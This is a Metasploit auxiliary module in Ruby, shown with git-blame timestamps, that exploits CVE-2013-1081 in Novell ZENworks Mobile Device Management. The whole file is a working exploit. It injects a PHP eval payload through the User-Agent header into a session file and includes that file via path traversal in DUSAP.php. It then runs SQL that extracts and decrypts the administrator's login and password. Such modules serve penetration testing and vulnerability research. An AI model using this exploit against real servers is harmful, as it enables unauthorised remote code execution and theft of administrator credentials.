2013-06-04 16:20:10 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-06-04 16:20:10 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Novell Zenworks Mobile Device Managment Admin Credentials',
|
|
|
|
'Description' => %q{
|
|
|
|
This module attempts to pull the administrator credentials from
|
|
|
|
a vulnerable Novell Zenworks MDM server.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'steponequit',
|
|
|
|
'Andrea Micalizzi (aka rgod)' #zdireport
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2013-1081'],
|
|
|
|
['OSVDB', '91119'],
|
|
|
|
['URL', 'http://www.novell.com/support/kb/doc.php?id=7011895']
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
OptString.new('TARGETURI', [true, 'Path to the Novell Zenworks MDM install', '/'])
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
register_advanced_options([
|
|
|
|
OptBool.new('SSL', [true, "Negotiate SSL connection", false])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def setup_session()
|
|
|
|
sess = Rex::Text.rand_text_alpha(8)
|
|
|
|
cmd = Rex::Text.rand_text_alpha(8)
|
|
|
|
res = send_request_cgi({
|
|
|
|
'agent' => "<?php echo(eval($_GET['#{cmd}'])); ?>",
|
|
|
|
'method' => "HEAD",
|
|
|
|
'uri' => normalize_uri("#{target_uri.path}", "download.php"),
|
|
|
|
'headers' => {"Cookie" => "PHPSESSID=#{sess}"},
|
|
|
|
})
|
|
|
|
return sess,cmd
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_creds(session_id,cmd_var)
|
|
|
|
cmd = '$pass=mdm_ExecuteSQLQuery('
|
|
|
|
cmd << '"SELECT UserName,Password FROM Administrators where AdministratorSAKey = 1"'
|
|
|
|
cmd << ',array(),false,-1,"","","",QUERY_TYPE_SELECT);'
|
|
|
|
cmd << 'echo "".$pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"])."";'
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri("#{target_uri.path}", "DUSAP.php"),
|
|
|
|
'vars_get' => {
|
|
|
|
'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
|
|
|
|
cmd_var => cmd
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
if res.nil?
|
|
|
|
print_error("Connection timed out")
|
|
|
|
return "", "" # Empty username & password
|
|
|
|
end
|
|
|
|
|
|
|
|
creds = res.body.to_s.match(/.*:"(.*)";.*";/)[1]
|
|
|
|
return creds.split(":")
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
print_status("Verifying that Zenworks login page exists at #{ip}")
|
|
|
|
uri = normalize_uri(target_uri.path)
|
|
|
|
|
|
|
|
begin
|
|
|
|
res = send_request_raw({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => uri
|
|
|
|
})
|
|
|
|
|
|
|
|
if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
|
|
|
|
print_status("Found Zenworks MDM, Checking application version")
|
|
|
|
ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
|
|
|
|
print_status("Found Version #{ver}")
|
|
|
|
session_id,cmd = setup_session()
|
|
|
|
user,pass = get_creds(session_id,cmd)
|
|
|
|
return if user.empty? and pass.empty?
|
|
|
|
print_good("Got creds. Login:#{user} Password:#{pass}")
|
|
|
|
print_good("Access the admin interface here: #{ip}:#{rport}#{target_uri.path}dashboard/")
|
|
|
|
|
|
|
|
report_auth_info(
|
|
|
|
:host => ip,
|
|
|
|
:port => rport,
|
|
|
|
:sname => "novellmdm",
|
|
|
|
:user => user,
|
|
|
|
:pass => pass,
|
|
|
|
:active => true
|
|
|
|
)
|
|
|
|
else
|
|
|
|
print_error("Zenworks MDM does not appear to be running at #{ip}")
|
|
|
|
return :abort
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
rescue ::OpenSSL::SSL::SSLError => e
|
|
|
|
return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted
|
|
|
|
end
|
|
|
|
end
|
2013-06-04 16:20:10 +00:00
|
|
|
|
|
|
|
end
|